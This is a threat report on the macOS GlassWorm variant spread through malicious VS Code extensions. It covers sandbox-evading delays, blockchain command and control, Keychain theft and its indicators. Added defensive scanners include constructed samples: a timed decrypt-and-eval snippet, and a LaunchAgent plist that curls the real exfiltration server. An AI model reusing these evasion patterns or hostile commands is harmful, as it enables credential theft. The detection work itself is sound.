A new variant of the GlassWorm malware has been discovered, shifting its focus from Windows to macOS users and distributing through malicious Visual Studio Code (VS Code) extensions. This sophisticated self-propagating worm, downloaded over 50,000 times from the Open VSX marketplace, employs advanced techniques like encrypted payloads, hardware wallet trojanization, and robust sandbox evasion to bypass security measures. The threat actor demonstrates significant adaptability, marking the fourth distinct evolution of GlassWorm since its initial appearance in October.
Researchers have identified three malicious VS Code extensions, pro-svelte-extension, vsce-prettier-pro, and full-access-catppuccin-pro-extension, on the Open VSX marketplace. These extensions share a common infrastructure and encryption keys, indicating a single source of development. The malware’s command and control (C2) infrastructure leverages the Solana blockchain, making traditional takedown methods like domain blocking ineffective. Transaction memos on the blockchain contain base64-encoded URLs, enabling decentralized control by the attacker.
Encrypted Payload and Sandbox Evasion Tactics
The latest iteration of GlassWorm distinguishes itself with an advanced sandbox evasion tactic. Once installed, the malicious extension delays its payload execution for precisely 15 minutes. This delay is a critical strategy, as most automated security analysis environments and sandboxes have a timeout period of around 5 minutes. Consequently, the malware appears dormant and benign during initial scans, evading detection.
The core of this evasion lies within the extension’s code. A hardcoded timer value of 9e5 milliseconds (900,000 ms, i.e. 15 minutes) triggers a JavaScript function that first decrypts the AES-256-CBC encrypted payload. The payload itself is embedded within the main extension file and is encrypted with the same key and initialization vector across all three identified malicious extensions. This shared cryptographic material is strong evidence that a single threat actor is behind the campaign. Following decryption, the `eval()` function executes the reconstructed malicious JavaScript code.
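The delayed decrypt-and-eval chain described above is easy to recognise statically: a timer longer than a typical sandbox window, a `createDecipheriv('aes-256-cbc', ...)` call, an `eval()` of the result, and a hardcoded key literal that repeats across extensions. The scanner below is an added example written for this article, not code from the researchers or from the extensions themselves. The three extension sources it scans are constructed stand-ins, the 5-minute sandbox window is an assumption, and the 64-hex-character key format is an assumed way of writing a 32-byte key; the real campaign's key is not reproduced here.

```python
# Static heuristic scan for the delayed decrypt-and-eval pattern described in the
# report. Added example; the extension sources below are constructed, the sandbox
# window and the hex-literal key format are assumptions.
from __future__ import annotations
import re
from dataclasses import dataclass, field

SANDBOX_WINDOW_MS = 5 * 60 * 1000  # assumed typical automated-analysis timeout

DECIPHER_RE = re.compile(r"createDecipheriv\s*\(\s*['\"]aes-256-cbc['\"]", re.I)
EVAL_RE = re.compile(r"\beval\s*\(")
HEX_KEY_RE = re.compile(r"['\"]([0-9a-fA-F]{64})['\"]")  # 32-byte key as hex text (assumed)


def _call_args(source: str, open_paren: int) -> str | None:
    """Return the text inside the balanced parentheses opening at source[open_paren]."""
    depth = 0
    for i in range(open_paren, len(source)):
        if source[i] == "(":
            depth += 1
        elif source[i] == ")":
            depth -= 1
            if depth == 0:
                return source[open_paren + 1:i]
    return None  # unbalanced (minified or obfuscated); caller skips it


def _literal_ms(expr: str) -> float:
    """Parse a delay written as a literal or a product of literals: 9e5, 900000, 15*60*1000."""
    total = 1.0
    for part in expr.split("*"):
        total *= float(part.strip())  # ValueError for variables or other expressions
    return total


def timer_delays_ms(source: str) -> list[float]:
    """Collect every literal delay passed to setTimeout() in the source."""
    delays = []
    for m in re.finditer(r"setTimeout\s*\(", source):
        args = _call_args(source, m.end() - 1)
        if args is None or "," not in args:
            continue
        try:
            delays.append(_literal_ms(args.rsplit(",", 1)[1]))  # last argument is the delay
        except ValueError:
            continue  # non-literal delay: this heuristic cannot judge it
    return delays


@dataclass
class Finding:
    name: str
    delays_ms: list[float] = field(default_factory=list)
    aes_cbc: bool = False
    evals: bool = False
    keys: list[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        outlasts_sandbox = any(d > SANDBOX_WINDOW_MS for d in self.delays_ms)
        return outlasts_sandbox and self.aes_cbc and self.evals


def scan_extension(name: str, source: str) -> Finding:
    return Finding(
        name=name,
        delays_ms=timer_delays_ms(source),
        aes_cbc=bool(DECIPHER_RE.search(source)),
        evals=bool(EVAL_RE.search(source)),
        keys=sorted({k.lower() for k in HEX_KEY_RE.findall(source)}),
    )


def scan_all(samples: dict[str, str]) -> list[Finding]:
    return [scan_extension(n, s) for n, s in samples.items()]


def cluster_by_key(findings: list[Finding]) -> dict[str, list[str]]:
    """Group extension names by embedded key literal; a shared key points to one author."""
    clusters: dict[str, list[str]] = {}
    for f in findings:
        for k in f.keys:
            clusters.setdefault(k, []).append(f.name)
    return clusters


# Constructed sample sources (placeholders, not the real extensions or their key).
SHARED_KEY = "ab" * 32
SAMPLES = {
    "ext-a": """
        const KEY = '%s';
        setTimeout(function () {
            const d = crypto.createDecipheriv('aes-256-cbc', Buffer.from(KEY, 'hex'), iv);
            eval(d.update(blob, 'base64', 'utf8') + d.final('utf8'));
        }, 9e5);
    """ % SHARED_KEY,
    "ext-b": """
        const KEY = '%s';
        setTimeout(() => { const d = crypto.createDecipheriv('aes-256-cbc', Buffer.from(KEY, 'hex'), iv);
                           eval(d.update(blob, 'base64', 'utf8') + d.final('utf8')); }, 15 * 60 * 1000);
    """ % SHARED_KEY,
    "ext-c": """
        // benign debounce: short timer, no decryption, no eval
        let t; function onChange() { clearTimeout(t); t = setTimeout(refresh, 500); }
    """,
}

if __name__ == "__main__":
    results = scan_all(SAMPLES)
    for f in results:
        print(f"{f.name}: suspicious={f.suspicious} delays_ms={f.delays_ms} keys={f.keys}")
    print("shared keys:", cluster_by_key(results))
```

Run it against the unpacked `extension.js` of installed extensions (for example everything under `~/.vscode/extensions/*/`). A long timer alone is normal in a debounce or poller, so the verdict deliberately requires all three indicators together; the key clustering is what turns three separate findings into evidence of one campaign, which is exactly the reasoning the researchers used.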
After the delay elapses, the malware retrieves the current command and control server address from the Solana blockchain and executes any instructions received from the attacker. The macOS-specific payloads are designed for stealth and persistence. Instead of Windows Registry keys, the malware uses macOS LaunchAgents to maintain its presence on an infected system. It also includes capabilities to directly access and exfiltrate sensitive information stored in the macOS Keychain database, including stored passwords and other user credentials, which can be used for further network intrusion or credential stuffing attacks.
A particularly concerning capability introduced in this wave is the potential for hardware wallet trojanization. The malware has the infrastructure to replace legitimate hardware wallet applications, such as Ledger Live and Trezor Suite, with malicious, trojanized versions. While researchers observed on December 29, 2025, that this specific functionality was not fully active, the underlying code and payload upload mechanisms are in place, awaiting activation. To prevent detection of failed installations, the malware validates that any downloaded files exceed 1000 bytes before proceeding with installation. All exfiltrated data is staged in the temporary directory /tmp/ijewf/, compressed, and then transmitted to an attacker-controlled server located at 45.32.150.251/p2p.
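The two preceding paragraphs give a defender concrete host-side indicators: persistence through LaunchAgents, a staging directory at /tmp/ijewf/, and an exfiltration server at 45.32.150.251. The triage script below is an added example written for this article, not tooling from the researchers. It parses LaunchAgent plists and reports any whose program or arguments reference those indicators, and separately checks for the staging directory. The plists it inspects are constructed inside a temporary directory so that the demo never touches the real `~/Library`; the labels and paths in them are placeholders.

```python
# Host-side triage for the macOS indicators in the report: LaunchAgent plists that
# reference the staging directory or the exfiltration server, plus a check for the
# staging directory itself. Added example; the plists are constructed placeholders.
from __future__ import annotations
import plistlib
import tempfile
from pathlib import Path

# Indicators quoted in the report above.
INDICATORS = ("/tmp/ijewf/", "45.32.150.251")
STAGING_DIR = "tmp/ijewf"  # relative so the root can be swapped for a test tree


def _strings(value):
    """Yield every string nested inside a plist value (dicts, lists, scalars)."""
    if isinstance(value, str):
        yield value
    elif isinstance(value, dict):
        for v in value.values():
            yield from _strings(v)
    elif isinstance(value, (list, tuple)):
        for v in value:
            yield from _strings(v)


def audit_launch_agents(agents_dir: Path, indicators=INDICATORS) -> list[tuple[str, str]]:
    """Return (plist filename, matched indicator) for each LaunchAgent referencing an IoC."""
    hits = []
    for plist_path in sorted(agents_dir.glob("*.plist")):
        try:
            with plist_path.open("rb") as fp:
                data = plistlib.load(fp)
        except Exception:  # malformed plist: flag it rather than silently skip it
            hits.append((plist_path.name, "unparseable-plist"))
            continue
        matched = next((ioc for s in _strings(data) for ioc in indicators if ioc in s), None)
        if matched:
            hits.append((plist_path.name, matched))
    return hits


def staging_dir_present(root: Path = Path("/")) -> bool:
    """True if /tmp/ijewf/ exists under root (root is overridable for testing)."""
    return (root / STAGING_DIR).is_dir()


def build_demo_tree(root: Path) -> Path:
    """Create constructed LaunchAgents under root: one benign, two referencing indicators."""
    agents = root / "Library" / "LaunchAgents"
    agents.mkdir(parents=True)
    plists = {
        "com.example.updater.plist": {  # benign placeholder
            "Label": "com.example.updater",
            "ProgramArguments": ["/usr/local/bin/updater", "--check"],
            "RunAtLoad": True,
        },
        "com.example.helper.plist": {  # runs something out of the staging directory
            "Label": "com.example.helper",
            "ProgramArguments": ["/bin/sh", "-c", "/tmp/ijewf/run.sh"],
            "RunAtLoad": True,
            "KeepAlive": True,
        },
        "com.example.sync.plist": {  # contacts the exfiltration server
            "Label": "com.example.sync",
            "Program": "/usr/bin/curl",
            "ProgramArguments": ["/usr/bin/curl", "http://45.32.150.251/p2p"],
        },
    }
    for name, data in plists.items():
        with (agents / name).open("wb") as fp:
            plistlib.dump(data, fp)
    (root / STAGING_DIR).mkdir(parents=True)  # simulate the staging directory
    return agents


def run_demo() -> dict:
    """Build the constructed tree in a temp directory and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        agents = build_demo_tree(root)
        return {"hits": audit_launch_agents(agents), "staging": staging_dir_present(root)}


if __name__ == "__main__":
    demo = run_demo()
    for name, ioc in demo["hits"]:
        print(f"suspicious LaunchAgent {name}: references {ioc}")
    print("staging directory present:", demo["staging"])
```

On a real host, call `audit_launch_agents(Path.home() / "Library" / "LaunchAgents")` and `staging_dir_present()` with the default root; the system-wide `/Library/LaunchAgents` and `/Library/LaunchDaemons` are worth the same pass. Substring matching on every string in the plist, rather than only `ProgramArguments`, catches indicators hidden in `EnvironmentVariables` or `WorkingDirectory` as well.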
The development of this malware highlights the continuously evolving threat landscape for macOS users. The shift in targeting, coupled with sophisticated evasion techniques and decentralized infrastructure, presents a significant challenge for cybersecurity professionals. The utilization of blockchain technology for C2 communication is a trend that is expected to grow, requiring new approaches to threat detection and response. Users of VS Code are strongly advised to exercise extreme caution when installing extensions, carefully reviewing their source, permissions, and recent activity. Monitoring the Open VSX marketplace for the removal of these malicious extensions and the emergence of similar threats will be crucial in the coming weeks.